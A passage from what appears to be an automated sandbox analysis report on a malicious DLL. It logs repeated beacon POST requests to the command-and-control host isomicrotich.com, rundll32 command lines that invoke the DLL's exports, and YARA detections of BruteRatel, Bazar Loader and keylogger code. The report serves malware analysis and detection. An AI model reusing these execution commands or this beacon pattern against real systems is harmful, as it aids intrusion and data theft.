                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sA4mBVBucUmTG8qP4bAVnX5GCbc9oLyVhfSHLAha%2B7edt7lkehdLyaLQleQMVrRMx1fruzWYovenadt7yps50trHcB2M2sxv4ebw5PukjxxuYN8zn75bLWyZcF%2FLTVu7671T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18f52ab47292-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-10-03 18:46:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          8192.168.2.949787188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:53 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFp9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:54 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:54 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xtc2JP9Ae174%2FJD7K5ACzgaZ3iN27JQWx62HpT6B73JI8PwUBgvmE%2B6eYMQrFc1MtjmccnD5y4cW9IhuZv3%2BSJXbq5fTj5fa%2F%2FLVbYfJ1pA2rF%2F55OLVnlLdWWh2V01AYdK6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18fbbe6543f8-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          9192.168.2.949788188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:54 UTC413OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFo9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:55 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:55 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EIJDUExhyhqyH5qssSxfmRrhCWZ9yn%2FysbcgpLf9w9JSbhBKbHGToOrfL6GkQCMGvA8YYObcUDMbdNZuHpLbtPKniuHXIZZzBrEKUKH3NFp8vHgv%2B6GDg6tiXMSjmpZMA5yS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf19021d8742c3-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          10192.168.2.949789188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:56 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:56 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:56 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hioI1bPsazYNkNDedKGiAdqRHwL8PgQ225cJfndZRROOy8YJkHJ%2B5smxoG1KdHOcJTb0QybC%2FvhRQozJt40ijCY%2B8uGpMQeDuq56WnhyRTYT9gP%2BI49z%2B0VWgxW8hj0LlYlu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf19091ec142e8-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          11192.168.2.949790188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:57 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:57 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:57 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrjJ4%2FRXQRTmL4qYcO3ym59jxKrroGBQldVwUQ5q9dcgq9kHjdi9uBd%2BPQI%2FSBBmaslEPyBvJYm97jAqOz6gDC3V4Ve1FwHksOp0WaDcWDY%2FpznR0NJJ6DRPQqZDrHrP%2Btxf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf190fafd141ac-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          12192.168.2.949793188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:46:59 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:46:59 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:59 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2B8p754LvSgPzxEErctrsQ2CfllYp927CF5umDKsJKsUvikb9LacDaD41pzb%2FcApDO0TaTzhUSG0fMJGEyQ8AksdEhXHQg8kNyXRCaZIv%2By1cTsNHimUwlb4cYGMfUdGaGz%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf191bcfd40cb8-EWR
                                                                                                                                                                                                                          2024-10-03 18:46:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          13192.168.2.949795188.114.96.34433504C:\Windows\explorer.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-03 18:47:00 UTC417OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zUSNCE0oZBu5/IYwe6mQXVa2E6ZIAtNQqOifcypP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3+mgYt+6QNuFccgoVDJ3BbcFDl1SAp8wUH4e/5NzsGF7Om8/OU9omVic1Eg5/oRnyhEvx+1XEEd76cEd8A==
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-03 18:47:00 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:47:00 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DItPFO1QuBUk90NXJ0gxjYZcGe4O0j%2BmAj8U9vkmDBHz8ve69DNsLYHNaKjMMS7nW0hcDKzFt2FCTIWFEN5I1dqDSPc8tBI%2Bm6BgyhXqPuGr6OOKpyxSrkDqDUUOpx3UndM7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf19237cb75e66-EWR
                                                                                                                                                                                                                          2024-10-03 18:47:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll"
                                                                                                                                                                                                                          Imagebase:0x7ff62c890000
                                                                                                                                                                                                                          File size:165'888 bytes
                                                                                                                                                                                                                          MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                                                                                                                                                                                                                          Imagebase:0x7ff71b580000
                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                          Start time:14:44:54
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 3648 -s 316
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:14:44:57
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                          Start time:14:44:57
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 328
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                          Start time:14:45:00
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                          Start time:14:45:00
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7468 -s 320
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_2, Description: Yara detected BruteRatel, Source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:26
